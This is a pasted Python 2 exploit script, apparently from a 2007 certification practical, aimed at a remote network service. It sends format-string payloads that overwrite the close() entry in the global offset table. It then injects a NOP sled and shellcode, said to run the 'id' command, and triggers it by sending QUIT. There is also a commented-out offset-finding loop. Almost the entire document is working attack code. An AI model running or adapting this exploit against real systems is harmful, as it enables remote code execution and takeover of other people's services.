Copied
- #!/usr/bin/python
- # Kristian Erik Hermansen
- # IACRB Practical #2
- # June, 2007
- import sys
- import time
- from socket import *
- if len(sys.argv) != 3:
- print "usage: %s <ip> <port>" % (sys.argv[0])
- exit(1)
- serverHost = sys.argv[1]
- serverPort = int(sys.argv[2])
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((serverHost, serverPort))
- target = '\x08\x04\x91\x40' # close() in GOT
- target_2 = '\x08\x04\x91\x42'
- # addr finder
- #n = 1
- #nmax = 700
- #while n <= nmax:
- # payload = target + 'AAA%' + str(n) + '$x'
- # #print 'Sending: ' + payload
- # s.send(payload[::-1] + '\n')
- # time.sleep(1)
- # data = s.recv(1024)
- # if data.find('41') != -1:
- # print payload
- # print data
- # n = n + 1
- #payload = target + 'ZZZ%14$14x%14$n'
- payload = target + 'ZZZ%.63281x%16$n' # 0xf738
- ###payload = target + target_2 + 'ZZZ%.17727x%16$hn%.18248x%16$hn'
- s.send(payload[::-1] + '\n')
- #time.sleep(1)
- #data = s.recv(1024)
- #print data
- payload = target_2 + 'ZZZ%.49144x%16$n' # 0xbfff
- s.send(payload[::-1] + '\n')
- #time.sleep(1)
- #data = s.recv(1024)
- #print data
- # invokes 'id' command in shell, check server output
- shellcode = "\x2b\xc9\x83\xe9\xf6\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7b"
- shellcode += "\x31\xb5\x9d\x83\xeb\xfc\xe2\xf4\x11\x3a\xed\x04\x29\x57\xdd\xb0"
- shellcode += "\x18\xb8\x52\xf5\x54\x42\xdd\x9d\x13\x1e\xd7\xf4\x15\xb8\x56\xcf"
- shellcode += "\x93\x32\xb5\x9d\x7b\x58\xd1\x9d\x2c\x62\x3c\x7c\xb6\xb1\xb5\x9d"
- # inject our code into reversed_line buffer
- s.send('\x90'*16 + shellcode[::-1] + '\n')
- #time.sleep(1)
- #data = s.recv(1024)
- #print data
- # finally force the GOT'd close() pointing to our injection
- s.send('QUIT\n')
- s.close()
create a new version of this paste
RAW Paste Data